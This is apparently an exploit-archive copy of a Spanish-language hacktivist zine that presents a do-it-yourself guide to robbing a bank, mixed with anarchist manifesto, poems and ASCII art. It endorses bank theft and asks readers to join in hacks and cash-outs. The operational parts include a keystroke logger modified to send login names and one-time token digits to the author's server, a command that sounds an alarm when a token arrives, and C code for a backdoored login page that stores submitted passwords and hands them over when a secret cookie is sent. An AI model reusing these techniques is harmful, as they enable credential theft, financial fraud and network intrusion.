[spanish] hackback a diy guide to rob banks Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-11-17 |
Type : papers |
Platform : ezine
This exploit / vulnerability [spanish] hackback a diy guide to rob banks is for educational purposes only and if it is used you will do on your own risk!
Todos somos niños salvajes
inocentes, libres, silvestres
Todos somos hermanos de los árboles
hijos de la tierra
Sólo tenemos que poner en nuestro corazón
una estrella encendida
(canción de Alberto Kuselman y Chamalú)
La policÃa va a invertir un chingo de recursos en investigarme. Creen que el
sistema funciona, o al menos que funcionará una vez que atrapen a todos los
"chicos malos". No soy más que el producto de un sistema que no funciona.
Mientras existan la injusticia, la explotación, la alienación, la violencia y la
destrucción ecológica, vendrán muchas más como yo: una serie interminable de
personas que rechazarán por ilegÃtimo el mal sistema responsable de este
sufrimiento. Ese sistema mal hecho no se va a componer arrestándome. Soy
solamente una de las millones de semillas que Tupac plantó hace 238 años en La
Paz [2], y espero que mis acciones y escritos rieguen la semilla de la rebelión
en sus corazones.
Aún asà con el pasamontañas y el cambio de nombre, muchos de los que apoyan mis
acciones quizás van a prestar demasiada atención a mi persona. Con su propia
autonomÃa hecha trizas por una vida entera de dominación, estarán buscando un
lÃder a seguir, o una heroÃna que les salve. Pero detrás del pasamontañas sólo
soy una niña. Todos somos niños salvajes. Nós só temos que colocar uma estrela
em chamas em nossos corações.
No nos equivoquemos, la expropiación no es robo. No es la confiscación de
dinero ganado "con el sudor de la frente". No es el robo de propiedad
privada. Es, más bien, la recuperación de enormes cantidades de tierra y
riqueza que han sido forjadas con recursos naturales robados, esclavitud
humana, fuerza de trabajo forzada y amasada en cientos de años por una
pequeña minorÃa. Esta riqueza... es ilegÃtima, tanto a efectos morales como
en tanto a los mecanismos de explotación que se han empleado para crearla.
Para Colin, el primer paso es que "tenemos que liberarnos de nuestras ataduras
mentales (al creer que la riqueza y la propiedad privada han sido ganadas por
quienes las monopolizan; y que, por tanto, deberÃan ser algo a respetar,
reverenciar, e incluso algo a perseguir), abrir nuestras mentes, estudiar y
aprender de la historia, y reconocer juntos esta ilegitimidad". Acá les dejo
algunos libros que me han ayudado con esto [7][8][9][10][11].
Según Barack Obama, la desigualdad económica es "el desafÃo que define a nuestro
tiempo". El hacking informático es una herramienta poderosa para combatir la
desigualdad económica. El antiguo director de la NSA, Keith Alexander, concuerda
y dice que el hacking es responsable de "la mayor transferencia de riqueza de la
historia".
_________________________
/ La historia es nuestra \
\ y la hacen lxs hackers! /
-------------------------
\
\ ^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`'
¡Allende presente, ahora y siempre!
Es por nuestra creencia colectiva en que el sistema financiero es incuestionable
que ejercemos control sobre nosotras mismas, y mantenemos el sistema de clases
sin que los de arriba tengan que hacer nada [3]. Poder ver cómo de vulnerable y
frágil es en realidad el sistema financiero nos ayuda a romper esa alucinación
colectiva. Por eso los bancos tienen un fuerte incentivo para no reportar los
hackeos, y para exagerar cómo de sofisticados son los atacantes. Ninguno de los
hackeos financieros que hice, o de los que he sabido, ha sido nunca reportado.
Este va a ser el primero, y no porque el banco quisiera, sino porque yo me
decidà a publicarlo.
Muchos de los que lean esto ya tienen, o con un poco de estudio van a ser
capaces de adquirir, las habilidades necesarias para llevar a cabo un hackeo
como este. Sin embargo, muchos se van a encontrar con que les faltan las
conexiones criminales necesarias para sacar los mangos en condiciones. En mi
caso, este era el primer banco que hackeaba, y en ese momento sólo tenÃa unas
pocas y mediocres cuentas preparadas para poder retirar el efectivo (conocidas
como bank drops), asà que solamente fueron unos cuantos cientos de miles los que
pude retirar en total, cuando lo normal es sacar millones. Ahora, en cambio, sÃ
que tengo el conocimiento y las conexiones para sacar efectivo más en serio, de
modo que si se encuentran hackeando un banco pero necesitan ayuda para convertir
eso en dinero de a de veras, y quieren usar esa lana para financiar proyectos
sociales radicales, se ponen en contacto conmigo.
3) Colaborar
Es posible hackear bancos como una aficionada que trabaja en solitario, pero la
neta es que, por lo general, no es tan fácil como lo pinto acá. Tuve suerte con
este banco por varias razones:
1) Era un banco pequeño, por lo que me tomó mucho menos tiempo llegar a
comprender cómo funcionaba todo.
2) No tenÃan ningún procedimiento para revisar los mensajes swift enviados.
Muchos bancos tienen uno, y necesitas escribir código para esconder tus
transferencias de su sistema de monitorización.
3) Sólo usaban autenticación por contraseña para acceder a la aplicación con la
que se conectaban a la red SWIFT. La mayorÃa de los bancos ahora usan RSA
SecurID, o alguna forma de 2FA. Puedes saltarte esto escribiendo código para
recibir una alerta cuando entren su token, y asà poder usarlo antes de que
expire. Es más sencillo de lo que parece: he usado Get-Keystrokes [1],
modificándolo para que en vez de almacenar las teclas pulsadas, se haga una
petición GET a mi servidor cada vez que se detecta que han introducido un
nombre de usuario. Esta petición añade el nombre de usuario a la url y,
conforme tipean el token, se hacen varios GET con los dÃgitos del token
concatenados a la url. En mi lado dejo esto corriendo mientras tanto:
ssh yo@mi_servidor_secreto 'tail -f /var/log/apache2/access_log'
| while read i; do echo $i; aplay alarma.wav &> /dev/null; done
Creo que si colaborase con otros hackers bancarios con experiencia podrÃamos
hacernos cientos de bancos como Carnabak, en vez de estar haciendo uno de tanto
en tanto por mi cuenta. Asà que si tienes experiencia con hackeos similares y
quieres colaborar, contactame. Encontrarás mi correo y mi llave PGP al final de
la guÃa anterior [3].
Puede que escribir artÃculos largos detallando tus acciones y tu ideologÃa no
sea la cosa más segura del mundo (¡ups!), pero a ratos siento que tenÃa que
hacerlo.
Si no creyera en quien me escucha
Si no creyera en lo que duele
Si no creyera en lo que quede
Si no creyera en lo que lucha
Que cosa fuera...
¿Que cosa fuera la maza sin cantera?
Muchos culpan a las personas queer del declive de esta sociedad;
estamos orgullosxs de ello
Algunos creen que queremos reducir a cenizas
esta civilización y su tejido moral;
No podrÃan estar más en lo cierto
Con frecuencia nos describen como depravadxs, decadentes y revoltosxs
Pero ¡ay! No han visto nada todavÃa
/* jala el log si mandamos una cookie especial */
char *cookies = getenv("HTTP_COOKIE");
if (cookies && strstr(cookies, "nuestra contraseña privada")) {
write(1, "Content-type: text/plain\n\n", 26);
pfile = open("/tmp/.pfile", O_RDONLY);
while ((nread = read(pfile, buf, sizeof(buf))) > 0)
write(1, buf, nread);
exit(0);
}
/* el principal almacena los datos del POST y se los envÃa al hijo,
que es el programa de login real */
int fd[2];
pipe(fd);
pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
if (fork()) {
close(fd[0]);
En el caso de Hacking Team, se logueaban a la VPN con passwords de un solo uso,
de modo que la VPN me dio acceso solamente a la red, y a partir de ahà me tomó
un esfuerzo extra conseguir admin de dominio en su red. En la otra guÃa escribÃ
sobre pases laterales y escalada de privilegios en dominios windows [1]. En este
caso, en cambio, eran las mismas contraseñas de dominio de windows las que se
usaban para autenticarse contra la VPN, asà que pude conseguir un buen de
contraseñas de usuarios, incluyendo la del admin de dominio. Ahora tenÃa total
acceso a su red, pero usualmente esta es la parte fácil. La parte más complicada
es entender cómo es que operan y cómo sacar el pisto.
[1] https://www.exploit-db.com/papers/41914
----[ 4.3 - Datos curiosos ]----------------------------------------------------
Redistribuir dinero expropiado a proyectos chileros que buscan un cambio social
positivo serÃa más fácil y seguro si esos proyectos aceptaran donaciones
anónimas vÃa criptomonedas como monero, zcash, o al menos bitcoin. Se entiende
que muchos de esos proyectos tengan una aversión a las criptomonedas, ya que
se parecen más a alguna extraña distopÃa hipercapitalista que a la economÃa
social con la que soñamos. Comparto su escepticismo, pero pienso que resultan
útiles para permitir donaciones y transacciones anónimas, al limitar la
vigilancia y control gubernamentales. Igual que el efectivo, cuyo uso muchos
paÃses están tratando de limitar por la misma razón.
,---------------------------------------------------.
_,-._ | Nos vilifican, esos infames; cuando la única |
; ___ : | diferencia es que ellos roban a los pobres |
,--' (. .) '--.__ | amparados por la ley, lo sabe el cielo, y nosotros|
_; ||| \ | saqueamos a los ricos bajo la única protección de |
'._,-----''';=.____," | nuestro propio coraje. ¿No has de preferir ser |
/// < o> |##| | uno de nosotros, antes que pordiosear ante esos |
(o \`--' / villanos en busca de trabajo? |
///\ >>>> _\ <<<< //`---------------------------------------------------'
--._>>>>>>>><<<<<<<< /
___() >>>[||||]<<<<
`--'>>>>>>>><<<<<<<
>>>>>>><<<<<<
>>>>><<<<<
>>ctr<<
Capitán Bellamy
--[ 11 - Aprende a hackear ]----------------------------------------------------
No se empieza hackeando bien. Empiezas hackeando mierda, pensando
que es bueno, y luego poco a poco vas mejorando. Por eso siempre digo
que una de las virtudes más valiosas es la persistencia.
- Consejos de Octavia Butler para la aspirante a APT
__________________________________________
/ Cuando el nivel cientÃfico de un mundo \
| supera por mucho su nivel de solidaridad,|
\ ese mundo se autodestruye. /
------------------------------------------
\ _.---._ . .
* \.' '. *
* _.-~===========~-._
. (___________________) . *
.' \_______/ .'
.' .'
'
- Ami
* Ami: El Niño de las Estrellas - Enrique Barrios
* La AnarquÃa Funciona
https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
funciona
* Viviendo Mi Vida - Emma Goldman
* The Rise and Fall of Jeremy Hammond: Enemy of the State
https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
hammond-enemy-of-the-state-183599/
Este cuate y el hack de HBGary fueron una inspiración
* DÃas de Guerra, Noches de Amor - Crimethinc
* Momo - Michael Ende
* Cartas a un joven poeta - Rilke
* Dominion (Documental)
"no podemos creer que, si no miramos, no sucederá lo que no queremos ver"
- Tolstoy en ÐŸÐµÑ€Ð²Ð°Ñ Ñтупень
El mundo hacker tiene una alta incidencia de depresión, suicidios y ciertas
batallas con la salud mental. No creo que sea a causa del hacking, sino por la
clase de ambiente del que en su mayorÃa provienen los hackers. Como muchas
hackers, crecà con escaso contacto humano: fui una niña criada por el internet.
Tengo mis luchas con la depresión y el entumecimiento emocional. A Willie Sutton
se le cita con frecuencia diciendo que robaba bancos porque "allà es donde está
el dinero", pero la cita es incorrecta. Lo que realmente dijo fue:
Cuando una persona no acepta su trabajo o misión empieza a padecer
enfermedades, aparentemente incurables; aunque no llega a morir en corto
tiempo, sino únicamente sufre, con el objetivo de despertar o tomar
conciencia. Por eso es indispensable que una persona que ha adquirido los
conocimientos y realiza su trabajo en las comunidades debe pagar su Toj y
mantener una comunicación constante con el Creador y su ruwäch q’ij, pues
necesita constantemente de la fuerza y energÃa de estos. De lo contrario,
las enfermedades que lo hicieron reaccionar o tomar el trabajo podrÃan
volver a causar daño.
Si sientes que el hacking está alimentando tu aislamiento, depresión, u otros
padecimientos, respira. Date un tiempo para conocerte y tomar conciencia. Vos
mereces vivir feliz, con salud y plenitud.
¿Eres una camarera de buen corazón que trabaja en una compañÃa del mal [1]?
¿EstarÃas dispuesta a introducir sigilosamente un keylogger fÃsico en la
computadora de un ejecutivo, a cambiar su cable de carga USB por uno modificado
[2], esconder un micro en alguna sala de reuniones donde planean sus
atrocidades, o a dejar uno de estos [3] olvidado en algún rincón de las
oficinas?
¿Eres bueno con ingenierÃa social y phishing, y conseguiste una shell en la
computadora de un empleado, o por ahà conseguiste sus credenciales de la vpn
usando phishing? ¿Pero quizás no pudiste conseguir admin de dominio y descargar
lo que querÃas?
¿Participaste en programas de bug bounties y te convertiste en una experta en
el hacking de aplicaciones web, pero no tienes suficiente experiencia hacker
para penetrar completamente la compañÃa?
Apoyar a aquellos en el poder para hackear y vigilar a disidentes, activistas y
a la población en general es hoy dÃa una industria de varios miles de millones
de dólares, mientras que hackear y exponer a quienes están en el poder es un
trabajo voluntario y arriesgado. Convertirlo en una industria de varios millones
de dólares ciertamente no va a arreglar ese desequilibrio de poder, ni va a
solucionar los problemas de la sociedad. Pero creo que va a ser divertido. AsÃ
que... ¡ya quiero ver gente comenzando a cobrar sus recompensas!
--[ 15 - Abolir las prisiones ]-------------------------------------------------
SerÃa tÃpico terminar un zine hacker diciendo liberen a hammond, liberen a
manning, liberen a hamza, liberen a los detenidos por el montaje del дело Сети,
etc. Voy a llevar esta tradición a su consecuencia más radical [1], y a decir:
¡hay que abolir las prisiones ya!. Siendo yo misma una delincuente, pueden
pensar que lo que ocurre es que tengo una visión un poco sesgada del asunto.
Pero en serio, es que ni siquiera es un tema controvertido, incluso la ONU está
prácticamente de acuerdo [2]. Asà que, de una buena vez, liberen a las personas
migrantes [3][4][5][6], encarceladas a menudo por esos mismos paÃses que crearon
la guerra y la destrucción ambiental y económica de la que huyen. Liberen a
todos los que están en prisión por la guerra contra quienes usan drogas [7].
Liberen a todas las personas encarceladas por la guerra contra los pobres [8].
Las prisiones lo único que hacen es esconder e ignorar la prueba de la
existencia de los problemas sociales, en lugar de arreglarlos de a de veras. Y
hasta que todxs sean liberados, lucha contra el sistema carcelario recordando y
teniendo presentes a aquellos que están atrapados ahà dentro. EnvÃales cariño,
cartas, helicópteros [9], radios piratas [10] y libros, y apoya a quienes se
organizan desde ahà adentro [11][12].
[1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
Davis-Son-obsoletas-las-prisiones-final.pdf
[2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
Promising_Practices_on_Alternatives_to_Imprisonment.pdf
[3] https://www.theguardian.com/us-news/2016/dec/21/
us-immigration-detention-center-christmas-santa-wish-list
[4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
images-tucson-arizona
[5] https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros-
Espana_22648665.html
[6] https://www.nytimes.com/2019/06/26/world/australia/
australia-manus-suicide.html
[7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
[8] VI, 2. i. La multa impaga: https://scielo.conicyt.cl/scielo.php?script=
sci_arttext&pid=S0718-00122012000100005
[9] p. 10, Libelo Nº2. BoletÃn polÃtico desde la Cárcel de Alta Seguridad
[10] https://itsgoingdown.org/transmissions-hostile-territory/
[11] https://freealabamamovement.wordpress.com/f-a-m-pamphlet-who-we-are/
[12] https://incarceratedworkers.org/
Nuestro mundo está patas arriba [1]. Tenemos un sistema de justicia que
representa a la injusticia. La ley y el orden están ahà para crear una ilusión
de paz social, y ocultar lo sistemático y profundo de la explotación, la
violencia, y la injusticia. Mejor seguir a tu conciencia, y no a la ley.
Los hombres de negocios se enriquecen maltratando a las personas y al planeta,
mientras que el trabajo de los cuidados queda mayormente sin pagar. Mediante el
asalto a todo lo comunal, de algún modo hemos levantado ciudades densamente
pobladas, plagadas por la soledad y el aislamiento. El sistema cultural,
polÃtico y económico en que vivimos alienta las peores facetas de la naturaleza
humana: la avaricia, el egoÃsmo y egocentrismo, la competitividad, la falta de
compasión y el apego por la autoridad. Asà que, para quien haya conseguido
permanecer sensible y compasivo en un mundo frÃo, para todas las heroÃnas
cotidianas que practican la bondad en las pequeñas cosas, para todas ustedes que
aún tienen una estrella encendida en sus corazones: гоpи, гоpи ÑÑно, чтобы не
погаÑло!